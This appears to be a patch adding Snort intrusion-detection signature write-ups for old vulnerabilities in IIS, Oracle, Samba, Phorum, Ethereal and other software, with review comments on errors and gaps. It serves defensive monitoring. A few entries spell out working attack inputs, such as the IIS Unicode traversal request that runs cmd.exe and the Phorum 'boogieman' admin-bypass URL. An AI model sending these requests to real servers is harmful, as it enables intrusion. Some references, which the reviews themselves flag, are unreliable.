+1491
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
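Review bot: the doc never says what is matched. Summary ("a weakness in a php application"), Detailed Information ("potential weaknesses in php applications") and Attack Scenarios ("a sensitive file containing information on the php application") all avoid naming the file or request; fill in the Rule line and the path, and say what the file exposes, otherwise "Ensure all measures have been taken to deny access to sensitive files" in Corrective Action is unactionable. Additional References is empty.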
--- /dev/null
+++ b/doc/signatures/3077.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+3077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the RNFR command of the IPSwitch WS_FTP server.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch WS_FTP service
+handles the RNFR command.  An excessively long parameter supplied to the
+command can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch WS_FTP 4.x, 5.x
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long parameter with the RNFR command,
+possibly causing denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Secunia:
+http://secunia.com/advisories/13334
+
+--
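Review bot: "An attacker can supplied an overly long parameter" in Attack Scenarios. Impact and Detailed Information repeat the same sentence; Detailed Information would be more useful if it gave the argument length at which RNFR overflows, since that is presumably the threshold the rule tests, and whether an authenticated session is required first (RNFR is a post-login command in FTP), which bounds who can trigger it. Corrective Action names no fixed version while Affected Systems says "4.x, 5.x"; the Secunia advisory cited should supply it.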
--- /dev/null
+++ b/doc/signatures/2463.txt
@@ -0,0 +1,70 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT IGMP IGAP message
+overflow attempt"; ip_proto:2; byte_test:1,>,63,0; byte_test:1,<,67,0;
+byte_test:1,>,64,13; reference:cve,CAN-2004-0176; reference:bugtraq,9952;
+classtype:attempted-admin; sid:2463; rev:1;)
+
+--
+Sid:
+2463
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Internet Group membership Authentication 
+Protocol (IGAP).
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed IGAP packet is decoded using Ethereal
+or tethereal.  This may permit the execution of arbitrary code with root or 
+LOCAL_SYSTEM privilege.  The buffer overflow occurs when a larger than expected
+Message Size value is discovered in the IGAP payload.
+
+--
+Affected Systems:
+Any host running Ethereal/tethereal versions 0.10.0 - 0.10.2. 
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed IGAP packet, and if decoded by
+a vulnerable version of Ethereal/tethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952:
+
+--
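Review bot: the rule and the prose do not explain each other. The rule tests `byte_test:1,>,63,0; byte_test:1,<,67,0` (IGMP type between 64 and 66, presumably the IGAP message types) and `byte_test:1,>,64,13` (the byte at offset 13 greater than 64), while Detailed Information says the overflow comes from "a larger than expected Message Size value"; state which IGAP header field sits at offset 13 and why 64 is the threshold, so a reader can check the rule against the dissector fix. Also note that the victim is the host running Ethereal/tethereal on the segment, not the packet's destination, and that with `ip any any -> any any` the rule fires on any IGMP packet meeting the byte tests regardless of direction. Minor: "Additional References" is missing its colon, and the Bugtraq URL has a trailing ":".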
--- /dev/null
+++ b/doc/signatures/2781.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2781
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
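Review bot: the Detailed Information paragraph has a newline between the procedure name and the end of its sentence, so it renders as "vulnerability in the procedure drop_snapshot_repgroup" followed by a line that begins ". This procedure is included in"; this looks like template substitution that kept the line break, and the three lines should be joined into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name, and Additional References is empty even though the Summary calls this a known vulnerability; a vendor alert or CVE link should be added before this ships.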
--- /dev/null
+++ b/doc/signatures/983.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+983
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "\" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "\" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
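Review bot: the CVE reference looks wrong: the Microsoft bulletin linked beneath it, MS00-078 (the IIS Unicode "Web Server Folder Traversal" issue), is tracked as CAN-2000-0884, not CAN-2000-0084, so please verify the identifier before this ships. Two typos as well: the Summary's "made use a unicode encoded representaion" should read "made to use a Unicode-encoded representation", and the Impact's "execute commands a vulnerable IIS server" is missing "on".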
--- /dev/null
+++ b/doc/signatures/1093.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1093
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
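Review bot: Affected Systems is left empty in this file and Additional References is empty too; since Detailed Information says the rule covers web, web application and ftp servers in general, either state that or write "Not applicable" rather than leaving the section blank, so a reader can tell it was considered. The Attack Scenarios paragraph mentions only "folders outside the ftp root directory" although the rule targets web servers as well; align the two paragraphs.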
--- /dev/null
+++ b/doc/signatures/2729.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2729
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
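Review bot: same issues as 2781.txt: the procedure name "add_priority_varchar2" is split from its sentence by a newline, leaving a line that begins ". This procedure is included in"; "Oracle Oracle9i" repeats the vendor; and Additional References is empty for what the Summary calls a known vulnerability.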
--- /dev/null
+++ b/doc/signatures/2248.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2248
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Persits AspUpload application.
+
+--
+Impact:
+Information disclosure. Possible retrieval of sensitive system files. 
+Installation of arbitrary files.
+
+--
+Detailed Information:
+Under certain circumstances it is possible to retrieve information from 
+outside the web root of a server using AspUpload by utilizing a 
+directory traversal technique. The same technique can also be used to 
+upload files of the attackers choosing to other areas of the file 
+system.
+
+The vulnerability exists in the sample scripts that accompany the 
+application.
+
+--
+Affected Systems:
+	AspUpload 2.1
+	
+--
+Attack Scenarios:
+The attacker can use a simple directory traversal technique when 
+supplying the filename for upload.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Remove the sample scripts installed by the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3608
+
+--
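Review bot: "files of the attackers choosing" in Detailed Information needs the possessive "attacker's". Otherwise the entry is consistent: the Bugtraq link supports the AspUpload 2.1 version claim, and the Corrective Action (remove the sample scripts) matches where Detailed Information says the flaw lives.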
--- /dev/null
+++ b/doc/signatures/1137.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+1137
+
+--
+Summary:
+This event is generated when an attempt is made to access the php 
+application Phorum using a default administrator account.
+
+--
+Impact:
+Severe - Phorum administration is controlled by the attacker
+
+--
+Detailed Information:
+Phorum is a popular PHP forum and versions 3.0.7 and previous are 
+vulnerable to this exploit.  An attacker can exploit a bug in Phorum's 
+auth.php script to gain administration access using a universal password
+(boogieman) supplied with the variable PHP_AUTH_USER. Phorum's PHP 
+scripts rely on auth.php to authenticate the user.
+
+--
+Attack Scenarios:
+The attacker requests /admin.php?PHP_AUTH_USER=boogieman from the Phorum
+PHP scripts. It is now possible to use the administration script to 
+modify all Phorum settings.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Phorum from www.phorum.org
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
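Review bot: this file has no Affected Systems section at all, while every other signature file places one between Detailed Information and Attack Scenarios; Detailed Information already states "versions 3.0.7 and previous are vulnerable", so add an Affected Systems entry reading "Phorum 3.0.7 and prior". Additional References is empty even though Corrective Action points at www.phorum.org; that URL belongs in the references.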
--- /dev/null
+++ b/doc/signatures/1741.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1741
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
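Review bot: typo "running ona web server" in Detailed Information (should be "on a"), and "attackers choosing" appears twice and needs the possessive. The text never names which PHP application or vulnerability this SID targets and Additional References is empty, so the entry cannot be told apart from the other generic PHP entries; add the application name and a reference, or at least say in the Summary that the rule is generic.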
--- /dev/null
+++ b/doc/signatures/2376.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
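Review bot: the version numbers under Affected Systems look off: "FW-1 1.4.1" and "VPN-1 1.4.1" are almost certainly meant to be 4.1 (the release that had service packs up to the SP6 the same line mentions); please verify against the vendor advisory. The vendor name is spelled "Checkpoint" in the Summary and "CheckPoint" in Affected Systems; pick one. Additional References is empty for a known vulnerability with proof-of-concept code, so add the advisory link.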
--- /dev/null
+++ b/doc/signatures/418.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+418
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Request datagram with an undefined ICMP code.
+
+--
+
+Impact:
+ICMP Information Request datagrams attempt to locate the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+Undefined ICMP Code values should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+This message is generated when a host attempts to locate the network number of the network segment it is located on..  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 15 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
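Review bot: Detailed Information has a double period in "the network segment it is located on..", and "Hosts that generated ICMP Information Request Messages are attempting" mixes tenses (should be "generate"). The file also omits the Affected Systems section and uses a different blank-line layout from the other signature files (a blank line after every "--", and none before the "--" that follows False Negatives); bring it in line with the template.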
--- /dev/null
+++ b/doc/signatures/566.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+566
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+--
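Review bot: the Summary sentence has no main verb: "This event is generated when network traffic indicating the use of an application or service that may violate a corporate security policy" needs "is seen" or similar at the end. More importantly, the only hint of what the rule actually detects is the Symantec pcAnywhere link under Additional References; the Summary and Detailed Information should name the application, since the body text is otherwise identical to the other policy-violation entries.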
--- /dev/null
+++ b/doc/signatures/2679.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2679
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure ksdwrt
+. This procedure is included in
+sys.dbms_system.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
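Review bot: same template problems as 2781.txt: "ksdwrt" is separated from the rest of its sentence by a newline, "Oracle Oracle9i" duplicates the vendor, and Additional References is empty.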
--- /dev/null
+++ b/doc/signatures/229.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+229
+
+--
+Summary:
+This event is generated when a Stacheldraht agent attempts to contact a known handler.
+
+--
+Impact:
+This indicates that a Stacheldraht agent may exist on the source host and a handler may exist on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  Once a host becomes a Stacheldraht agent, it will attempt to contact a list of known handlers using an ICMP echo reply with an ICMP identification number of 666 and a string of "skillz" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A compromised host that has become a Stacheldraht agent will attempt an initial communication with all known handlers.
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS190
+
+--
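Review bot: "The Stacheldraht DDoS uses a tiered structure" in Detailed Information is missing a noun ("DDoS tool"). Otherwise the entry is self-consistent: the trigger described there (ICMP echo reply, ICMP id 666, "skillz" in the payload) matches the Summary and the Arachnids reference.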
--- /dev/null
+++ b/doc/signatures/3030.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3030
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
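Review bot: two typos in Detailed Information: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing a space after the period. Additional References is empty although Affected Systems pins the issue to "Samba 3.0.8 and prior" and the text describes an integer overflow in access control list handling; link the Samba advisory for that release (and its CVE, once confirmed) so the version claim can be checked.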
--- /dev/null
+++ b/doc/signatures/3245.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3245
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
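Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed DCOM request sent over RPC; one of the two should be reworded so the reader knows what the rule actually fires on. Typo "Expoit" in Ease of Attack. Additional References is empty; the Microsoft bulletin for the RPC DCOM overflow should be linked.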
--- /dev/null
+++ b/doc/signatures/1456.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1456
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
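Review bot: Affected Systems and Additional References are both empty, and Detailed Information has the typo "ona web server". The body is generic authentication-bypass boilerplate that never identifies the web server or application this SID matches; add at least the product name so the entry can be distinguished from 1187.txt, which carries the same text word for word.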
--- /dev/null
+++ b/doc/signatures/1999.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1999
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
